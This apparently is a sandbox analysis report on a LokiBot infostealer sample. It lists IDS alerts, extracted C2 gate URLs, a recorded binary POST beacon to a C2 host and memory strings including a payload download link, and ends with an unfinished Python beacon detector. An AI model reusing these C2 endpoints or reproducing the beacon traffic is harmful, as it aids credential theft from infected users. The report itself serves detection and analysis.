                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49720
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49721 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49721 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49721 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49721 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49721 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49721
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49722 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49722 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49722 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49722 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49722 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49722
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49723 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49723 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49723 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49723 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49723 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49723
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49724 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49724 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49724 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49724 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49724 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49724
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49725 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49725 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49725 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49725 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49725 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49725
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49726 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49726 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49726 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49726 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49726 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49726
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49727 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49727 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49727 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49727 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49727 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49727
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49728 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49728 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49728 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49728 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49728 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49728
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49729 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49729 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49729 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49729 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49729 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49729
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49730 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49730 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49730 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49730 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49730 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49730
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49731 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49731 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49731 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49731 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49731 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49731
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49732 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49732 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49732 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49732 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49732 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49732
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Malware configuration extractorURLs: http://sedesadre.gq/PKZ/PWS/fre.php
                Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 198Connection: close
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 198Connection: close
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.516579808.0000000001529000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.397774648.00000000009AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.521644432.000000000327E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.519732360.0000000003147000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                Source: powershell.exe, 00000001.00000002.423054874.00000000059BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000001.00000002.404488163.0000000004A9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.518826525.0000000003087000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.401922859.0000000004961000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: RegAsm.exe, 0000000E.00000002.537381760.00000000004A0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://sedesadre.gq/PKZ/PWS/fre.php
                Source: powershell.exe, 00000001.00000002.404488163.0000000004A9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: svchost.exe, 00000005.00000002.320847106.0000014604A13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                Source: powershell.exe, 00000001.00000002.423054874.00000000059BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000001.00000002.423054874.00000000059BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000001.00000002.423054874.00000000059BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                Source: svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                Source: svchost.exe, 00000005.00000002.321088494.0000014604A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                Source: svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                Source: svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                Source: svchost.exe, 00000005.00000002.321163191.0000014604A4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.319680997.0000014604A48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                Source: svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                Source: svchost.exe, 00000005.00000002.321088494.0000014604A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                Source: svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                Source: svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                Source: svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                Source: svchost.exe, 00000005.00000003.319937311.0000014604A40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321132883.0000014604A42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                Source: svchost.exe, 00000005.00000003.319937311.0000014604A40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321132883.0000014604A42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                Source: svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                Source: svchost.exe, 00000005.00000003.319937311.0000014604A40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                Source: svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                Source: svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                Source: svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                Source: svchost.exe, 00000005.00000003.319680997.0000014604A48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                Source: svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                Source: svchost.exe, 00000005.00000002.321088494.0000014604A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 00000005.00000003.297637720.0000014604A31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.519404605.00000000030D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://edi4gw.db.files.1drv.com/y4moAVxpkKoBi-6Ib81P-C-8nQTO5eCh6D0sQf0K95pl0pcu4vWhHgGACuDQhzDgbUK
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.519404605.00000000030D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://edi4gw.db.files.1drv.com4
                Source: powershell.exe, 00000001.00000002.404488163.0000000004A9B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000001.00000002.420135572.00000000051CD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
                Source: powershell.exe, 00000001.00000002.423054874.00000000059BE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.518826525.0000000003087000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://onedrive.live.com
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.518826525.0000000003087000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://onedrive.live.com/download?cid=9A063D4B0D931024&resid=9A063D4B0D931024
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe | String found in binary or memory: https://onedrive.live.com/download?cid=9A063D4B0D931024&resid=9A063D4B0D931024%21128&authkey=AFWFoMk
                Source: svchost.exe, 00000005.00000002.321088494.0000014604A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                Source: svchost.exe, 00000005.00000002.321088494.0000014604A3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.320944817.0000014604A27000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                Source: svchost.exe, 00000005.00000003.297637720.0000014604A31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                Source: svchost.exe, 00000005.00000002.321224479.0000014604A55000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                Source: svchost.exe, 00000005.00000003.297637720.0000014604A31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                Source: svchost.exe, 00000005.00000003.297637720.0000014604A31000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321064418.0000014604A3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                Source: svchost.exe, 00000005.00000002.321163191.0000014604A4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.319680997.0000014604A48000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.531258657.0000000006C30000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000003.490102974.00000000045F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.newtonsoft.com/jsonschema
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.531258657.0000000006C30000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000003.490102974.00000000045F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                Source: unknown | HTTP traffic detected:
                    POST /PKZ/PWS/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: sedesadre.gq
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: ACA06F78
                    Content-Length: 198
                    Connection: close
                Source: unknown | DNS traffic detected: queries for: onedrive.live.com
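The POST recorded above is the Lokibot check-in: a hard-coded `Mozilla/4.08 (Charon; Inferno)` User-Agent, HTTP/1.0, a binary octet-stream body and a non-standard `Content-Key` header, sent to a `fre.php` gate. The following is an added example of analyst detection code written for this report; it is not part of the sandbox output or of the sample. The request text is reconstructed from the report's own line (the 198-byte binary body is not shown in the report and is omitted), the benign request is a constructed negative control, and the scoring thresholds are the author's choice.

```python
"""Flag HTTP requests that match the Lokibot C2 beacon recorded in this report.

Added example: analyst code, not part of the sandbox report or of the malware.
"""
from dataclasses import dataclass
from typing import Dict, List

# Constructed from the POST recorded under "HTTP traffic detected". The real body
# was 198 bytes of binary data that the report does not show, so it is omitted.
SAMPLE_REQUEST = (
    "POST /PKZ/PWS/fre.php HTTP/1.0\r\n"
    "User-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
    "Host: sedesadre.gq\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Encoding: binary\r\n"
    "Content-Key: ACA06F78\r\n"
    "Content-Length: 198\r\n"
    "Connection: close\r\n"
    "\r\n"
)

# Constructed benign request used as a negative control.
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/107.0\r\n"
    "Accept: */*\r\n"
    "\r\n"
)

# Fixed User-Agent Lokibot sends with every beacon (present verbatim in the report).
LOKIBOT_UA = "Mozilla/4.08 (Charon; Inferno)"


@dataclass
class HttpRequest:
    method: str
    path: str
    version: str
    headers: Dict[str, str]  # header names lower-cased


def parse_request(raw: str) -> HttpRequest:
    """Parse the request line and headers of a raw HTTP/1.x request (body ignored)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line:
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, version, headers)


def lokibot_indicators(req: HttpRequest) -> List[str]:
    """Return the names of the Lokibot beacon traits present in the request."""
    hits: List[str] = []
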